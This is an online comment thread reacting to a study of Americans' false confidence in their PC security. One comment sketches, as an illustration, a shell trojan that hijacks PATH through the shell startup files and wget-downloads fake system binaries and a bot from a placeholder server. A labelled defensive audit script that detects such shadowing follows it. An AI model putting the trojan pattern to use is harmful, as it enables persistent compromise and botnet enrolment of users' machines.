Most In US Have False Sense of Online Security
BaCa sends along a link from Net-Security on a study of attitudes among Americans about the security of their PCs, versus their actual vulnerability. "More than half of computer users who think they are protected against online threats like spyware, viruses, and hackers actually have inadequate or no online protection, according to an independent research study conducted for Verizon... While 92 percent of participants thought they were safe, the scans revealed that 59 percent were actually vulnerable to a variety of online dangers. Ninety-four percent of those surveyed said they would find it helpful to be able to diagnose or check their online security status on a regular basis to make sure their PCs were safe."
Even after meeting online criminals in person, they still tried to rip me off. Fortunately, I tracked them down and got them. Stolen and Recovered 1949 Chevy Saga
Look, my Windows machines auto-update themselves, and I have AVG running, which also updates itself. I have a firewall downstream of my modem and upstream of every other machine on the network.
What else can I do?
My wife is constantly playing and downloading games from the internet. No doubt she is polluting machines on our network.
Basically my approach to security on my home machines is I wipe them and rebuild them every 6 months or so, in case there is some hidden malware on there that has turned my machine into a zombie.
What I would really like is a "smart firewall" I could buy and put in place of my current firewall. This device would monitor all network traffic going in and out of my house, and it would stop the bad things from going through. It could even be a service whereby the device is managed by some security firm and I pay them to protect my network through this device.
A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
But then you have the problems of
(a) who do they trust to do it. Part of the reason for this problem is that the user is too trusting, and will download/run anything properly "padded" with the right context. What's to keep them from trusting Joe's Bot Shop for their security?
(b) when they do need something set up/installed quickly, it could be problematic for them to wait for the person/people in charge of security.
(c) the extra cost if they don't have family/friends who are sufficiently competent and have the time?
While taking it out of their hands might be a good idea, it might also not be feasible.
Self proclaimed typo king, and inventor of the bear destroying coffee table (patent not pending).
*GASP* I thought AOL was keeping us all safe online!
The game.
Spyware removal is flawed, the focus should be on preventing it getting there in the first place.
Same with viruses.
The big problem is that people believe the hype.
"Windows $version is the most secure windows ever!"
"$program makes your machine secure"
Rather than being vigilant, they believe the hype around some product claiming to take away all the security risks.
End users really need managed workstations, managed by people who know what they're doing.
Or perhaps kiosk style systems for browsing, booted from non writable media, perhaps with a writable memory card to store your personal settings (with no ability to execute anything on the memory card).
Someone should do that, create a standard for a bootable CD/DVD, which loads settings from a removable media device (usb stick, memory card etc) but strictly prevents any code being executed (mount the removable device noexec?).
http://spamdecoy.net - free throwaway anonymous email - avoid spam!
False Sense of Security Day
It would be on the anniversary of the signing of the patriot act.
So many political jokes to make about this...so little time to post them all
What?
The problem is, short of a secure list of what can install/run (like application branding, properly implemented), and absolute prohibition of running non-branded applications, nothing can save the users from themselves.
You have the trade off of "flexibility" and "security".
As a rough example - if a user downloads and runs this in their system:
fixed for lameness filter
START
bashbang/bin/sh
STARTUPS EQUALS ".bashrc .cshrc .shrc .login" #add more to be more versatile
bash create our h4x0red bin dir
mkdir tilde/.bin
bash put it in the start of the path on all shells
for f in $STARTUPS
do
if [ "$f" EQUALS ".bashrc" -o "$f" EQUALS ".shrc" -o "$f" EQUALS ".login" ]
then
echo "export PATH EQUALS "~/.bin;$PATH" >> $f
echo "~/.bin/my_custom_bot" >> $f
#... one for each syntax
fi
done
bash download the fake apps
FAKES EQUALS "which ls firefox firefox1.5 firefox2.0 opera lynx mail evolution kmail pine elm mutt sh my_custom_bot" bash need more?
cd ~/.bin
for prog in $FAKES
do
bash clever hackers would put something here to fetch via IRC or FTP, but I'm not good enough
wget http://some_server/hacked/${uname -s}/${uname -r}/$prog
done
STOP
And now the user has spyware and is part of a botnet. (The bot application would check to see if it is already running, if not, startup and try to fork a daemon, if it can't do that, it'll run in the background.)
As long as you use a regular system as can be found in UNIX, how can you prevent users from causing problems like that without (a) sacrificing flexibility and interoperability, and/or (b) having a highly skilled administrator to keep an eye on them?
Self proclaimed typo king, and inventor of the bear destroying coffee table (patent not pending).
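A defender's check for the pattern sketched in the post above, added here as an example and not part of the original comment: it reads a home directory's shell startup files, collects the home-relative directories they add to PATH, and reports executables there that share a name with a system command. The function names, the startup-file list and the SYSTEM_DIRS default are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit for PATH prepends that let user-writable files shadow system commands.
STARTUP_FILES=".bashrc .cshrc .shrc .login .profile .bash_profile"   # assumed list
SYSTEM_DIRS=${SYSTEM_DIRS:-"/bin /usr/bin /sbin /usr/sbin /usr/local/bin"}

# Print each directory under the home dir that a startup file puts on PATH.
# Recognises ~/dir, $HOME/dir and ${HOME}/dir on any line mentioning PATH/path.
path_dirs_from_startup() {
    audit_home_dir=$1
    for f in $STARTUP_FILES; do
        [ -f "$audit_home_dir/$f" ] || continue
        grep -i 'path' "$audit_home_dir/$f" |
            grep -o -E '(~|\$HOME|\$\{HOME\})/[A-Za-z0-9._/-]+' |
            while read -r d; do
                # Drop the "~", "$HOME" or "${HOME}" prefix (everything up to the first "/").
                echo "$audit_home_dir/${d#*/}"
            done
    done | sort -u
}

# Print one line per executable in $1 whose name also exists in a system directory.
find_shadowing() {
    scan_dir=$1
    [ -d "$scan_dir" ] || return 0
    for p in "$scan_dir"/* "$scan_dir"/.[!.]*; do
        [ -f "$p" ] && [ -x "$p" ] || continue
        name=${p##*/}
        for s in $SYSTEM_DIRS; do
            if [ -x "$s/$name" ]; then
                echo "SHADOW $p hides $s/$name"
                break
            fi
        done
    done
    return 0
}

# Full audit of one home directory: every PATH directory found, checked for shadowing.
audit_home() {
    path_dirs_from_startup "$1" | while read -r dir; do
        find_shadowing "$dir"
    done
}

# Stand-alone use: sh audit.sh /home/someuser
if [ -n "${1:-}" ]; then audit_home "$1"; fi
```

A personal bin directory on PATH is common and legitimate, so the PATH entry alone is only a lead; a file there named like `ls`, `sh` or a browser is the finding worth investigating.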
That's my point. Security should be something that is taken out of the hands of the average user. They shouldn't be expected to become security experts. They should be taught how to be a little more web-savvy. I hear a commercial all the time on the radio in NYC for CyberStreetSmart.org, which is run by the New York Public Interest Research Group (NYPIRG), trying to do just that. The commercial is compelling because they say (paraphrasing) "If someone came up to you on the street and said they had a million dollars to give you and all you had to do is give them $1000 to get it, you'd laugh at them, but on-line, most people don't think twice." That's why security has to be built-in rather than added-on: the average user has been sold the idea that the Internet is magic. They don't apply the same rules to information there that they would to things that happen to them directly.
GetOuttaMySpace - The Anti-Social Network
I have kids who use my systems. They run under normal accounts (The biggest security advantage of Vista is that normal accounts run well, unlike XP) and hence can mess up their own accounts, but are not so likely to mess up my account.
User accounts can perform DOS's and network attacks against other systems every bit as easily as administrator accounts, but it is easier for administrative tools to monitor the behavior of user accounts than it is for these tools to monitor the action of things running as system.
Linux is not a virus target at the moment, but that's not because it's perfectly secure -- it's just because it's more secure, and since Windows is both easier to infect and has more users, it's a much more attractive target. It is likely that even if malware writers turned their full attention to attacking Linux, they would never be so successful against it as they are against Windows... but that doesn't mean they wouldn't have any success at all.